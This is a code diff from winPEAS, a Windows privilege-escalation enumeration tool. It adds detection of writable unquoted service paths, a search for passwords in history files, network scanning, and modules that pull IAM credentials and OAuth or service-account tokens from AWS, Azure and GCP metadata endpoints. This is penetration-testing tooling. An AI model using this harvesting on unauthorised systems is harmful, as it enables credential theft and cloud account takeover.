catch (Exception ex)
{

9
winPEAS/winPEASexe/winPEAS/Checks/ProcessInfo.cs
View File

@@ -36,11 +36,14 @@ namespace winPEAS.Checks
{ "Possible DLL Hijacking.*", Beaprint.ansi_color_bad },
};
if (DefensiveProcesses.Definitions.ContainsKey(procInfo["Name"]))
// we need to find first occurrence of the procinfo name
string processNameSanitized = procInfo["Name"].Trim().ToLower();
if (DefensiveProcesses.AVVendorsByProcess.ContainsKey(processNameSanitized))
{
if (!string.IsNullOrEmpty(DefensiveProcesses.Definitions[procInfo["Name"]]))
if (DefensiveProcesses.AVVendorsByProcess[processNameSanitized].Count > 0)
{
procInfo["Product"] = DefensiveProcesses.Definitions[procInfo["Name"]];
procInfo["Product"] = string.Join(", ", DefensiveProcesses.AVVendorsByProcess[processNameSanitized]);
}
colorsP[procInfo["Product"]] = Beaprint.ansi_color_good;
}

32
winPEAS/winPEASexe/winPEAS/Checks/SystemInfo.cs
View File

@@ -387,20 +387,26 @@ namespace winPEAS.Checks
static void PrintCachedCreds()
{
Beaprint.MainPrint("Cached Creds");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#cached-credentials", "If > 0, credentials will be cached in the registry and accessible by SYSTEM user");
string cachedlogonscount = RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "CACHEDLOGONSCOUNT");
if (!string.IsNullOrEmpty(cachedlogonscount))
try{
Beaprint.MainPrint("Cached Creds");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#cached-credentials", "If > 0, credentials will be cached in the registry and accessible by SYSTEM user");
string cachedlogonscount = RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "CACHEDLOGONSCOUNT");
if (!string.IsNullOrEmpty(cachedlogonscount))
{
int clc = Int16.Parse(cachedlogonscount);
if (clc > 0)
{
Beaprint.BadPrint(" cachedlogonscount is " + cachedlogonscount);
}
else
{
Beaprint.BadPrint(" cachedlogonscount is " + cachedlogonscount);
}
}
}
catch (Exception ex)
{
int clc = Int16.Parse(cachedlogonscount);
if (clc > 0)
{
Beaprint.BadPrint(" cachedlogonscount is " + cachedlogonscount);
}
else
{
Beaprint.BadPrint(" cachedlogonscount is " + cachedlogonscount);
}
Beaprint.PrintException(ex.Message);
}
}

12
winPEAS/winPEASexe/winPEAS/FodyWeavers.xml
View File

@@ -1,3 +1,11 @@
<Weavers xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="FodyWeavers.xsd">
<Costura />
<?xml version="1.0" encoding="utf-8"?>
<Weavers xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="FodyWeavers.xsd">
<Costura IncludeDebugSymbols='false'>
<Unmanaged32Assemblies>
SQLite.Interop
</Unmanaged32Assemblies>
<Unmanaged64Assemblies>
SQLite.Interop
</Unmanaged64Assemblies>
</Costura>
</Weavers>

30
winPEAS/winPEASexe/winPEAS/FodyWeavers.xsd
View File

@@ -17,6 +17,16 @@
<xs:documentation>A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="ExcludeRuntimeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of runtime assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="IncludeRuntimeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of runtime assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="Unmanaged32Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 32 bit assembly names to include, delimited with line breaks.</xs:documentation>
@@ -43,6 +53,16 @@
<xs:documentation>Controls if .pdbs for reference assemblies are also embedded.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IncludeRuntimeReferences" type="xs:boolean">
<xs:annotation>
<xs:documentation>Controls if runtime assemblies are also embedded.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="UseRuntimeReferencePaths" type="xs:boolean">
<xs:annotation>
<xs:documentation>Controls whether the runtime assemblies are embedded with their full path or only with their assembly name.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="DisableCompression" type="xs:boolean">
<xs:annotation>
<xs:documentation>Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option.</xs:documentation>
@@ -73,6 +93,16 @@
<xs:documentation>A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="ExcludeRuntimeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of runtime assembly names to exclude from the default action of "embed all Copy Local references", delimited with |</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IncludeRuntimeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of runtime assembly names to include from the default action of "embed all Copy Local references", delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="Unmanaged32Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 32 bit assembly names to include, delimited with |.</xs:documentation>

17
winPEAS/winPEASexe/winPEAS/Helpers/Beaprint.cs
View File

@@ -120,19 +120,22 @@ namespace winPEAS.Helpers
public static void PrintUsage()
{
Console.WriteLine(YELLOW + " [*] " + GREEN + "WinPEAS is a binary to enumerate possible paths to escalate privileges locally" + NOCOLOR);
Console.WriteLine(YELLOW + " [*] " + GREEN + "WinPEAS is a binary to enumerate possible paths to escalate privileges locally. By default it'll run all the following checks unless otherwise specified, but you could also indicate as arguments the names of the checks to run if you only want to run a few of them." + NOCOLOR);
Console.WriteLine(LCYAN + " domain" + GRAY + " Enumerate domain information" + NOCOLOR);
Console.WriteLine(LCYAN + " systeminfo" + GRAY + " Search system information" + NOCOLOR);
Console.WriteLine(LCYAN + " eventsinfo" + GRAY + " Display interesting events information" + NOCOLOR);
Console.WriteLine(LCYAN + " userinfo" + GRAY + " Search user information" + NOCOLOR);
Console.WriteLine(LCYAN + " processinfo" + GRAY + " Search processes information" + NOCOLOR);
Console.WriteLine(LCYAN + " servicesinfo" + GRAY + " Search services information" + NOCOLOR);
Console.WriteLine(LCYAN + " applicationsinfo" + GRAY + " Search installed applications information" + NOCOLOR);
Console.WriteLine(LCYAN + " networkinfo" + GRAY + " Search network information" + NOCOLOR);
Console.WriteLine(LCYAN + " cloudinfo" + GRAY + " Enumerate cloud information" + NOCOLOR);
Console.WriteLine(LCYAN + " windowscreds" + GRAY + " Search windows credentials" + NOCOLOR);
Console.WriteLine(LCYAN + " browserinfo" + GRAY + " Search browser information" + NOCOLOR);
Console.WriteLine(LCYAN + " filesinfo" + GRAY + " Search generic files that can contains credentials" + NOCOLOR);
Console.WriteLine(LCYAN + " fileanalysis" + GRAY + " Search specific files that can contains credentials and for regexes inside files" + NOCOLOR);
Console.WriteLine(LCYAN + " eventsinfo" + GRAY + " Display interesting events information" + NOCOLOR);
Console.WriteLine(LCYAN + " fileanalysis" + GRAY + " [NOT RUN BY DEFAULT] Search specific files that can contains credentials and for regexes inside files. Might take several minutes." + NOCOLOR);
Console.WriteLine(LCYAN + " all" + GRAY + " Run all checks the previous check including fileanalysis." + NOCOLOR);
Console.WriteLine();
Console.WriteLine(LCYAN + " quiet" + GRAY + " Do not print banner" + NOCOLOR);
Console.WriteLine(LCYAN + " notcolor" + GRAY + " Don't use ansi colors (all white)" + NOCOLOR);
@@ -147,6 +150,11 @@ namespace winPEAS.Helpers
Console.WriteLine(LCYAN + " -lolbas" + GRAY + $" Run additional LOLBAS check" + NOCOLOR);
Console.WriteLine(LCYAN + " -linpeas=[url]" + GRAY + $" Run additional linpeas.sh check for default WSL distribution, optionally provide custom linpeas.sh URL\n" +
$" (default: {Checks.Checks.LinpeasUrl})" + NOCOLOR);
Console.WriteLine(LCYAN + " -network|-ports" + GRAY + $" Run additional network scanning - find network interfaces, hosts and scan nmap top 1000 TCP ports for each host found\n" +
$" -network=\"auto\" - find interfaces/hosts automatically" + NOCOLOR + "\n" +
$" -network=\"10.10.10.10,10.10.10.20\" - scan only selected ip address(es)" + NOCOLOR + "\n" +
$" -network=\"10.10.10.10/24\" - scan host based on ip address/netmask" + NOCOLOR + "\n" +
$" -ports=\"80,443,8080\" - If a list of ports is provided, use this list instead of the nmap top 1000 TCP" + NOCOLOR);
}
@@ -291,8 +299,7 @@ namespace winPEAS.Helpers
string value = entry.Value;
string key = entry.Key;
string line = "";
string line;
if (!no_gray)
{
line = ansi_color_gray + " " + key + ": " + NOCOLOR + value;

45
winPEAS/winPEASexe/winPEAS/Helpers/MyUtils.cs
View File

@@ -122,6 +122,51 @@ namespace winPEAS.Helpers
return binaryPath;
}
public static bool CheckQuoteAndSpaceWithPermissions(string path, out List<string> injectablePaths)
{
List<string> result = new List<string>();
bool isInjectable = false;
if (!path.Contains('"') && !path.Contains("'"))
{
if (path.Contains(" "))
{
string currentPath = string.Empty;
foreach (var pathPart in Regex.Split(path, @"\s"))
{
currentPath += pathPart + " ";
if (File.Exists(currentPath) || Directory.Exists(currentPath))
{
var permissions = PermissionsHelper.GetPermissionsFolder(currentPath, Checks.Checks.CurrentUserSiDs, PermissionType.WRITEABLE_OR_EQUIVALENT);
if (permissions.Any())
{
result.Add(currentPath);
isInjectable = true;
}
}
else
{
var firstPathPart = currentPath;
DirectoryInfo di = new DirectoryInfo(firstPathPart);
var exploitablePath = di.Parent.FullName;
var folderPermissions = PermissionsHelper.GetPermissionsFolder(exploitablePath, Checks.Checks.CurrentUserSiDs, PermissionType.WRITEABLE_OR_EQUIVALENT);
if (folderPermissions.Any())
{
result.Add(exploitablePath);
isInjectable = true;
};
}
}
}
}
injectablePaths = result.Select(i => i).Distinct().ToList();
return isInjectable;
}
public static bool CheckQuoteAndSpace(string path)
{
if (!path.Contains('"') && !path.Contains("'"))

34
winPEAS/winPEASexe/winPEAS/Helpers/Registry/RegistryHelper.cs
View File

@@ -24,6 +24,40 @@ namespace winPEAS.Helpers.Registry
return Microsoft.Win32.Registry.LocalMachine.OpenSubKey(path);
}
public static bool WriteRegValue(string hive, string path, string keyName, string value)
{
try
{
RegistryKey regKey;
if (hive == "HKCU")
{
regKey = Microsoft.Win32.Registry.CurrentUser.OpenSubKey(path);
}
else if (hive == "HKU")
{
regKey = Microsoft.Win32.Registry.Users.OpenSubKey(path);
}
else
{
regKey = Microsoft.Win32.Registry.LocalMachine.OpenSubKey(path);
}
if (regKey == null)
{
return false;
}
regKey.SetValue(keyName, value, RegistryValueKind.String);
}
catch (Exception ex)
{
return false;
}
return true;
}
public static string GetRegValue(string hive, string path, string value)
{
// returns a single registry value under the specified path in the specified hive (HKLM/HKCU)

43
winPEAS/winPEASexe/winPEAS/Info/ApplicationInfo/AutoRuns.cs
View File

@@ -5,8 +5,10 @@ using System.IO;
using System.Linq;
using System.Management;
using System.Text.RegularExpressions;
using winPEAS.Checks;
using winPEAS.Helpers;
using winPEAS.Helpers.Registry;
using winPEAS.Helpers.YamlConfig;
namespace winPEAS.Info.ApplicationInfo
{
@@ -256,6 +258,9 @@ namespace winPEAS.Info.ApplicationInfo
{
}
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(filepath, out injectablePaths);
results.Add(new Dictionary<string, string>()
{
{"Reg", autorunLocation[0] + "\\" + autorunLocation[1]},
@@ -274,7 +279,7 @@ namespace winPEAS.Info.ApplicationInfo
"interestingFileRights",
orig_filepath.Length > 1 ? string.Join(", ", PermissionsHelper.GetPermissionsFile(orig_filepath, Checks.Checks.CurrentUserSiDs)) : ""
},
{"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(filepath).ToString()}
{"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
});
}
}
@@ -299,6 +304,9 @@ namespace winPEAS.Info.ApplicationInfo
orig_filepath = Environment.ExpandEnvironmentVariables(orig_filepath).Replace("'", "").Replace("\"", "");
string folder = Path.GetDirectoryName(orig_filepath);
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(orig_filepath, out injectablePaths);
results.Add(new Dictionary<string, string>()
{
{"Reg", autorunLocation[0] + "\\" + reg},
@@ -317,7 +325,7 @@ namespace winPEAS.Info.ApplicationInfo
"interestingFileRights",
orig_filepath.Length > 1 ? string.Join(", ", PermissionsHelper.GetPermissionsFile(orig_filepath, Checks.Checks.CurrentUserSiDs)) : ""
},
{"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(orig_filepath).ToString()}
{"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
});
}
}
@@ -342,6 +350,12 @@ namespace winPEAS.Info.ApplicationInfo
string usersPath = Path.Combine(Environment.GetEnvironmentVariable(@"USERPROFILE"));
usersPath = Directory.GetParent(usersPath).FullName;
var config = YamlConfigHelper.GetWindowsSearchConfig();
var pwdInsideHistory = config.variables.FirstOrDefault(v => v.name.Equals("pwd_inside_history", StringComparison.InvariantCultureIgnoreCase)).value;
// add .* around each element to match the whole line
var items = pwdInsideHistory.Split('|').Select(v => $".*{v}.*");
pwdInsideHistory = string.Join("|", items);
try
{
if (Directory.Exists(usersPath))
@@ -373,6 +387,14 @@ namespace winPEAS.Info.ApplicationInfo
foreach (string filepath in files)
{
var fileContent = File.ReadAllText(filepath);
var sensitiveInfoList = FileAnalysis.SearchContent(fileContent, pwdInsideHistory, false);
// remove all non-printable and control characters
sensitiveInfoList = sensitiveInfoList.Select(s => s = Regex.Replace(s, @"\p{C}+", string.Empty)).ToList();
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(filepath, out injectablePaths);
string folder = Path.GetDirectoryName(filepath);
results.Add(new Dictionary<string, string>() {
{ "Reg", "" },
@@ -383,7 +405,8 @@ namespace winPEAS.Info.ApplicationInfo
{ "isWritableReg", ""},
{ "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))},
{ "interestingFileRights", string.Join(", ", PermissionsHelper.GetPermissionsFile(filepath, Checks.Checks.CurrentUserSiDs))},
{ "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(path).ToString() }
{"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" },
{ "sensitiveInfoList", string.Join(", ", sensitiveInfoList) },
});
}
}
@@ -403,6 +426,9 @@ namespace winPEAS.Info.ApplicationInfo
{
try
{
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(folder, out injectablePaths);
results.Add(new Dictionary<string, string>() {
{ "Reg", "" },
{ "RegKey", "" },
@@ -412,7 +438,7 @@ namespace winPEAS.Info.ApplicationInfo
{ "isWritableReg", ""},
{ "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))},
{ "interestingFileRights", ""},
{ "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(folder).ToString() }
{"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
});
}
catch (Exception)
@@ -447,6 +473,9 @@ namespace winPEAS.Info.ApplicationInfo
try
{
string folder = Path.GetDirectoryName(filepathCleaned);
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(command, out injectablePaths);
results.Add(new Dictionary<string, string>()
{
{"Reg", ""},
@@ -463,7 +492,7 @@ namespace winPEAS.Info.ApplicationInfo
"interestingFileRights",
string.Join(", ", PermissionsHelper.GetPermissionsFile(filepath, Checks.Checks.CurrentUserSiDs))
},
{"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(command).ToString()}
{"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
});
}
catch (Exception)
@@ -505,6 +534,8 @@ namespace winPEAS.Info.ApplicationInfo
if (File.Exists(path))
{
string folder = Path.GetDirectoryName(path);
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(path, out injectablePaths);
results.Add(new Dictionary<string, string>
{
@@ -516,7 +547,7 @@ namespace winPEAS.Info.ApplicationInfo
{ "isWritableReg", ""},
{ "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))},
{ "interestingFileRights", string.Join(", ", PermissionsHelper.GetPermissionsFile(path, Checks.Checks.CurrentUserSiDs))},
{ "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(path).ToString() }
{"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
});
}
}

201
winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AWSInfo.cs Normal file
View File

@@ -0,0 +1,201 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Net;
using winPEAS.Helpers;
namespace winPEAS.Info.CloudInfo
{
internal class AWSInfo : CloudInfoBase
{
/*
* notes - possible identification:
*
- "c:\Program Files\Amazon\EC2Launch"
- "C:\Program Files\Amazon\EC2Launch\service\EC2LaunchService.exe"
- "c:\Program Files (x86)\AWS SDK for .NET"
- get EC2_TOKEN: PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600", it should start with "AQ"
*/
const string AWS_FOLDER = "c:\\Program Files\\Amazon\\";
const string AWS_BASE_URL = "http://169.254.169.254/latest/api/token";
const string METADATA_URL_BASE = "http://169.254.169.254/latest/meta-data";
public override string Name => "AWS EC2";
private Dictionary<string, List<EndpointData>> _endpointData = null;
public override bool IsCloud => Directory.Exists(AWS_FOLDER);
public override Dictionary<string, List<EndpointData>> EndpointDataList()
{
if (_endpointData == null)
{
_endpointData = new Dictionary<string, List<EndpointData>>();
try
{
if (IsAvailable)
{
string API_TOKEN = CreateMetadataAPIRequest(AWS_BASE_URL, "PUT", new WebHeaderCollection { { "X-aws-ec2-metadata-token-ttl-seconds", "21600" } });
_endpointData.Add("General Info", GetGeneralMetadataInfo(API_TOKEN));
_endpointData.Add("Account Info", GetAccountMetadataInfo(API_TOKEN));
_endpointData.Add("Network Info", GetNetworkMetadataInfo(API_TOKEN));
_endpointData.Add("IAM Role", GetIAMRoleMetadataInfo(API_TOKEN));
_endpointData.Add("User Data", GetUserDataMetadataInfo(API_TOKEN));
_endpointData.Add("EC2 Security Credentials", GetSecurityCredentialsMetadataInfo(API_TOKEN));
/*
* print_3title "SSM Runnig"
ps aux 2>/dev/null | grep "ssm-agent" | grep -v "grep" | sed "s,ssm-agent,${SED_RED},"
*
*/
}
else
{
_endpointData.Add("General Info", new List<EndpointData>()
{
new EndpointData()
{
EndpointName = "",
Data = null,
IsAttackVector = false
}
});
}
}
catch (Exception ex)
{
Beaprint.PrintException(ex.Message);
}
}
return _endpointData;
}
private List<EndpointData> GetSecurityCredentialsMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("ec2-instance", "identity-credentials/ec2/security-credentials/ec2-instance", false),
};
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetUserDataMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("user-data", "latest/user-data", false),
};
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetIAMRoleMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>
{
new Tuple<string, string, bool>("iam/info", "iam/info", false)
};
var url = $"{METADATA_URL_BASE}/iam/security-credentials/";
var roles = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } });
foreach (var role in roles.Split('\n'))
{
metadataEndpoints.Add(new Tuple<string, string, bool>(role, $"iam/security-credentials/{role}", false));
}
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetNetworkMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>();
var url = $"{METADATA_URL_BASE}/network/interfaces/macs/";
var macs = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } });
var urlBase = "network/interfaces/macs";
foreach (var mac in macs.Split('\n'))
{
metadataEndpoints.Add(new Tuple<string, string, bool>("Owner ID", $"{urlBase}/{mac}/owner-id", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Public Hostname", $"{urlBase}/{mac}/public-hostname", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Security Groups", $"{urlBase}/{mac}/security-groups", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Private IPv4s", $"{urlBase}/{mac}/ipv4-associations/", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Subnet IPv4", $"{urlBase}/{mac}/subnet-ipv4-cidr-block", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Private IPv6s", $"{urlBase}/{mac}/ipv6s", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Subnet IPv6", $"{urlBase}/{mac}/subnet-ipv6-cidr-blocks", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Public IPv4s", $"{urlBase}/{mac}/public-ipv4s", false));
}
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetAccountMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("account info", "identity-credentials/ec2/info", false),
};
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetGeneralMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("ami id", "ami-id", false),
new Tuple<string, string, bool>("instance action","instance-action", false),
new Tuple<string, string, bool>("instance id","instance-id", false),
new Tuple<string, string, bool>("instance life-cycle","instance-life-cycle", false),
new Tuple<string, string, bool>("instance type","instance-type", false),
new Tuple<string, string, bool>("placement/region","placement/region", false),
};
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetMetadataInfo(List<Tuple<string, string, bool>> endpointData, string apiToken)
{
List<EndpointData> _endpointDataList = new List<EndpointData>();
foreach (var tuple in endpointData)
{
string url = $"{METADATA_URL_BASE}/{tuple.Item2}";
var result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } });
_endpointDataList.Add(new EndpointData()
{
EndpointName = tuple.Item1,
Data = result,
IsAttackVector = tuple.Item3
});
}
return _endpointDataList;
}
public override bool TestConnection()
{
return CreateMetadataAPIRequest(AWS_BASE_URL, "GET") != null;
}
}
}

88
winPEAS/winPEASexe/winPEAS/Info/CloudInfo/AzureInfo.cs Normal file
View File

@@ -0,0 +1,88 @@
using System.Collections.Generic;
using System.IO;
using System.Net;
using System;
namespace winPEAS.Info.CloudInfo
{
internal class AzureInfo : CloudInfoBase
{
public override string Name => "Azure VM";
public override bool IsCloud => Directory.Exists(WINDOWS_AZURE_FOLDER);
private Dictionary<string, List<EndpointData>> _endpointData = null;
const string WINDOWS_AZURE_FOLDER = "c:\\windowsazure";
const string AZURE_BASE_URL = "http://169.254.169.254/metadata/";
const string API_VERSION = "2021-12-13";
public override Dictionary<string, List<EndpointData>> EndpointDataList()
{
if (_endpointData == null)
{
_endpointData = new Dictionary<string, List<EndpointData>>();
List<EndpointData> _endpointDataList = new List<EndpointData>();
try
{
string result;
List<Tuple<string, string, bool>> endpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("Instance Details", $"instance?api-version={API_VERSION}", false),
new Tuple<string, string, bool>("Load Balancer details", $"loadbalancer?api-version={API_VERSION}", false),
new Tuple<string, string, bool>("Management token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://management.azure.com/", true),
new Tuple<string, string, bool>("Graph token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://graph.microsoft.com/", true),
new Tuple<string, string, bool>("Vault token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://vault.azure.net/", true),
new Tuple<string, string, bool>("Storage token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://storage.azure.com/", true)
};
if (IsAvailable)
{
foreach (var tuple in endpoints)
{
string url = $"{AZURE_BASE_URL}{tuple.Item2}";
result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "Metadata", "true" } });
_endpointDataList.Add(new EndpointData()
{
EndpointName = tuple.Item1,
Data = result,
IsAttackVector = tuple.Item3
});
}
}
else
{
foreach (var endpoint in endpoints)
{
_endpointDataList.Add(new EndpointData()
{
EndpointName = endpoint.Item1,
Data = null,
IsAttackVector = false
});
}
}
_endpointData.Add("General", _endpointDataList);
}
catch (Exception ex)
{
}
}
return _endpointData;
}
public override bool TestConnection()
{
return CreateMetadataAPIRequest(AZURE_BASE_URL, "GET") != null;
}
}
}

77
winPEAS/winPEASexe/winPEAS/Info/CloudInfo/CloudInfoBase.cs Normal file
View File

@@ -0,0 +1,77 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Text;
namespace winPEAS.Info.CloudInfo
{
internal abstract class CloudInfoBase
{
public abstract string Name { get; }
public abstract bool IsCloud { get; }
public abstract Dictionary<string, List<EndpointData>> EndpointDataList();
public abstract bool TestConnection();
private bool? _isAvailable;
public bool IsAvailable
{
get
{
if (_isAvailable == null)
{
_isAvailable = TestConnection();
}
return _isAvailable.Value;
}
}
protected string CreateMetadataAPIRequest(string url, string method, WebHeaderCollection headers = null)
{
try
{
var request = WebRequest.CreateHttp(url);
if (headers != null)
{
request.Headers = headers;
}
request.Method = method;
using (var response = (HttpWebResponse)request.GetResponse())
{
using (var responseStream = response.GetResponseStream())
{
// Get a reader capable of reading the response stream
using (var myStreamReader = new StreamReader(responseStream, Encoding.UTF8))
{
// Read stream content as string
var content = myStreamReader.ReadToEnd();
return content;
}
}
}
}
catch (WebException exception)
{
if (exception.InnerException != null)
{
return typeof(SocketException) == exception.InnerException.GetType() ? null : string.Empty;
}
}
catch (Exception ex)
{
return string.Empty;
}
return string.Empty;
}
}
}

10
winPEAS/winPEASexe/winPEAS/Info/CloudInfo/EndpointData.cs Normal file
View File

@@ -0,0 +1,10 @@
namespace winPEAS.Info.CloudInfo
{
internal class EndpointData
{
public string EndpointName { get; set; }
public string Data { get; set; }
public bool IsAttackVector { get; set; }
}
}

208
winPEAS/winPEASexe/winPEAS/Info/CloudInfo/GCPInfo.cs Normal file
View File

@@ -0,0 +1,208 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Net;
using winPEAS.Helpers;
namespace winPEAS.Info.CloudInfo
{
internal class GCPInfo : CloudInfoBase
{
public override string Name => "Google Cloud Platform";
const string GCP_BASE_URL = "http://{URL_BASE}/";
const string GCP_FOLDER = "C:\\Program Files\\Google\\Compute Engine\\";
/*
C:\Program Files\Google\Compute Engine\agent\GCEWindowsAgent.exe"
C:\Program Files\Google\OSConfig\google_osconfig_agent.exe"
c:\Program Files (x86)\Google\Cloud SDK"
http://metadata.google.internal
*/
public override bool IsCloud => Directory.Exists(GCP_FOLDER);
private Dictionary<string, List<EndpointData>> _endpointData = null;
const string METADATA_URL_BASE = "http://metadata.google.internal/computeMetadata/v1";
public override Dictionary<string, List<EndpointData>> EndpointDataList()
{
if (_endpointData == null)
{
_endpointData = new Dictionary<string, List<EndpointData>>();
try
{
if (IsAvailable)
{
_endpointData.Add("GC Project Info", GetGCProjectMetadataInfo());
_endpointData.Add("OSLogin Info", GetOSLoginMetadataInfo());
_endpointData.Add("Instance Info", GetInstanceMetadataInfo());
_endpointData.Add("Interfaces", GetInterfacesMetadataInfo());
_endpointData.Add("User Data", GetUserMetadataInfo());
_endpointData.Add("Service Accounts", GetServiceAccountsMetadataInfo());
}
else
{
_endpointData.Add("General Info", new List<EndpointData>()
{
new EndpointData()
{
EndpointName = "",
Data = null,
IsAttackVector = false
}
});
}
}
catch (Exception ex)
{
Beaprint.PrintException(ex.Message);
}
}
return _endpointData;
}
private List<EndpointData> GetServiceAccountsMetadataInfo()
{
var metadataEndpoints = new List<Tuple<string, string, bool>>();
var serviceAccountsEndpointUrlBase = "instance/service-accounts";
var url = $"{METADATA_URL_BASE}/{serviceAccountsEndpointUrlBase}";
var serviceAccounts = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection { { "X-Google-Metadata-Request", "True" } });
// TODO
// echo " Name: $sa" - ignored for now
foreach (var serviceAccount in serviceAccounts.Trim().Split('\n'))
{
metadataEndpoints.Add(new Tuple<string, string, bool>("Email", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}email", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Aliases", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}aliases", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Identity", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}identity", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Scopes", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}scopes", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Token", $"{serviceAccountsEndpointUrlBase}/{serviceAccount}token", false));
}
var result = GetMetadataInfo(metadataEndpoints);
return result;
}
